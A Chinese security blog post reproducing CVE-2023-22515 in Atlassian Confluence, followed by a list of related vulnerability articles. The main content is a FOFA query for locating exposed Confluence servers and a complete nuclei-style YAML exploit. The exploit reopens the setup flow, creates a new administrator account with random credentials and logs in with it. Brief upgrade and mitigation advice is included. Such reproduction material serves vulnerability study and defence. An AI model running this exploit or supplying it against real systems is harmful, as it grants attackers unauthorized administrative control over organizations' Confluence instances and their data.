Confluence 未授权提权访问漏洞 CVE-2023-22515

最新推荐文章于 2025-05-17 10:48:40 发布
最新推荐文章于 2025-05-17 10:48:40 发布
阅读量393 收藏 3
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全 漏洞复现 安全威胁分析 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jd_cx/article/details/148024914

漏洞描述

CVE-2023-22515 是 Atlassian Confluence 中的一个安全漏洞,允许攻击者在未经授权的情况下提升权限并访问系统资源。影响特定版本的 Atlassian Confluence。攻击者可以通过构造恶意请求绕过身份验证机制,从而获得管理员权限或其他高权限访问。

影响版本

该漏洞影响以下 Confluence 版本:

  • Confluence Data Center 和 Server 8.0.0 至 8.5.1

fofa

app="ATLASSIAN-Confluence"

poc yaml格式

variables:
  username: "{{rand_base(10)}}"
  password: "{{rand_base(10)}}"
  email: "{{username}}@{{password}}"
http:
  - raw:
      - |
        GET /setup/setupadministrator-start.action HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /setup/setupadministrator-start.action HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout:20s
        POST /setup/setupadministrator.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check

        username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Atlassian-Token: no-check

        os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action
      - |
        GET /welcome.action HTTP/1.1
        Host: {{Hostname}}
    cookie-reuse: true
    redirects: true
    matchers:
      - type: dsl
        dsl:
          - contains(body_1, 'Setup is already complete')
          - contains(body_3, 'Please configure the system administrator account for this Confluence installation')
          - contains(location_5, '/index.action')
          - status_code_5 == 302
          - contains(body_6, 'Administration')
        condition: and

修复建议

为了修复该漏洞,建议采取以下措施:

  1. 升级到最新版本:Atlassian 已发布修复版本,建议用户尽快升级到 Confluence 8.5.2 或更高版本。
  2. 应用临时缓解措施:如果无法立即升级,可以通过限制对 Confluence 实例的访问或禁用相关功能来降低风险。
  3. 监控日志:定期检查 Confluence 日志,查找异常活动或未经授权的访问尝试。

升级步骤

以下是升级 Confluence 的步骤:

  1. 下载最新版本的 Confluence 安装包。
  2. 备份当前 Confluence 实例的数据和配置文件。
  3. 停止 Confluence 服务。
  4. 安装新版本并启动服务。
  5. 验证升级是否成功,并确保所有功能正常运行。

临时缓解措施

如果无法立即升级,可以采取以下临时措施:

  • 限制对 Confluence 实例的访问,仅允许受信任的 IP 地址访问。
  • 禁用不必要的插件或功能,减少攻击面。
  • 启用严格的访问控制策略,确保只有授权用户可以访问敏感资源。

参考链接

通过以上措施,可以有效降低 CVE-2023-22515 带来的安全风险,确保 Confluence 实例的安全性。

Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 1210
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
Confluence 未授权漏洞分析CVE-2023-22515
蚁景网安学院
11-22 689
Confluence 是由 Atlassian 开发的企业级协作软件。2023年10月,Atlassian 官方披露 CVE-2023-22515 Atlassian Confluence Data Center &Server 漏洞。攻击者可构造恶意请求创建管理员,从而登录系统,造成敏感信息泄漏等。
Confluence远程命令执行漏洞(CVE-2024-21683)
最新发布
swordheart的博客
05-17 295
Atlassian公司的Confluence软件存在远程命令执行漏洞CVE-2024-21683),攻击者可通过该漏洞获取服务器限。受影响版本包括Confluence Data Center和Server的多个版本,从7.17.0到8.9.0。漏洞利用需要攻击者拥有管理员限,并通过上传恶意JavaScript文件执行任意命令。漏洞利用过程包括获取Atlassian Token、管理员登录、认证以及上传恶意文件。
漏洞分析Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
网络安全知识分享
03-21 1693
Confluence 的开发者 Atlassian 已公告此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
Confluence 漏洞复现CVE-2023-22515,CVE-2023-22518)
huangyongkang666的博客
11-09 2284
Confluence 漏洞复现CVE-2023-22515CVE-2023-22518)
confluence注入漏洞
zzf9347的博客
03-18 473
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
漏洞复现-Atlassian Confluence Data Center 与 Server 存在限绕过漏洞 (CVE-2023-22518)
玄道的网安博客
08-11 1241
通过/json路由前缀可以直接访问到/setup和/admin namespace里定义的接口,而WebSudoInterceptor又默认认为/json路由下的接口不需要管理员二次登录,仅在接口方法有WebSudoRequired注解时需管理员二次登录。WebSudoInterceptor首先获取请求的url,如果接口url以/admin/开头,则接口默认需要管理员二次登录,仅在接口方法有WebSudoNotRequired注解时无需管理员二次登录。官方已修复该漏洞,建议用户按照官方修复步骤。
Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396
山兔的博客
08-07 591
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果示填写路径,路径填写。我这边建立失败了,就不复现了。
CVE-2021-26084(confluence
sinat_42420072的博客
01-26 1955
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
漏洞与预防】Atlassian Confluence存在远程代码执行漏洞
solarset的博客
04-16 1056
本案例参考thedfirreport.com在2025年2月24日据发布的DFIR 报告,LockBit 勒索软件利用CVE-2023-22527入侵 Confluence服务器最终导致勒索软件加密整个生产环境中的攻击手法。
漏洞复现CVE-2024-21683:Confluence远程代码执行漏洞
网络安全从业者的学习笔记
07-18 3157
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 8462
CVE-2022-26134】Confluence OGNL RCE 漏洞
Atlassian Confluence 模板注入代码执行漏洞
qq_32947907的博客
01-23 1042
Confluence 是由Atlassian公司开发的企业协作和文档管理工具。Atlassian Confluence Data Center/Server 受影响版本中由于velocity vm模版可未授权访问,其中/aui/text-inline.vm使用findValue解析OGNL表达式,表达式过滤不严,导致存在模版注入漏洞。攻击者可通过构造恶意请求,可以在未登录的情况下在Confluence实例上触发远程代码执行漏洞
CVE-2023-22515:Atlassian Confluence漏洞复现 [附POC]
薛定谔嘚喵博客
11-24 1256
Atlassian Confluence Data Center 和 Confluence Server 存在漏洞,该漏洞由属性覆盖导致,未经身份验证的远程攻击者可以重新执行 Confluence 安装流程并增加管理员账户,从而访问 Confluence 实例。
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)
qq_53003652的博客
10-16 3690
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。Atlassian Confluence是企业广泛使用的wiki系统。nuclei已上线该yaml (CVE-2023-22515)此时用户已经创建完毕,登录。
浅析 Apache Confluence [CVE-2023-22515]
milu_Sec的博客
12-31 1199
我们已经看到,此漏洞的根本原因是攻击者能够在未经身份验证的端点的 Action 对象上执行复杂的 getter/setter 方法,从而允许修改关键属性。同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在公众号平台,如果不想错过我们新鲜出炉的好文,那就请扫码关注我们的公众号!希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以加本人微信(i_still_be_milu)与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。
atlassian confluece 信息泄露漏洞
cnbird's blog
08-28 1746
#!/usr/bin/env python import httplib, json, sys, re if (re.search("^https://", sys.argv[1].lower()) == None): httpconnection = httplib.HTTPConnection(re.split("^http://",sys.argv[1].lower())[1])
2023RCE漏洞复现
01-04
针对Atlassian Confluence的远程代码执行(RCE)漏洞(CVE-2023-22527),该漏洞允许攻击者通过发送特制请求来执行任意命令。此漏洞源于Confluence服务器处理特定HTTP请求的方式不当。 具体来说,当存在未授权访问或弱...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值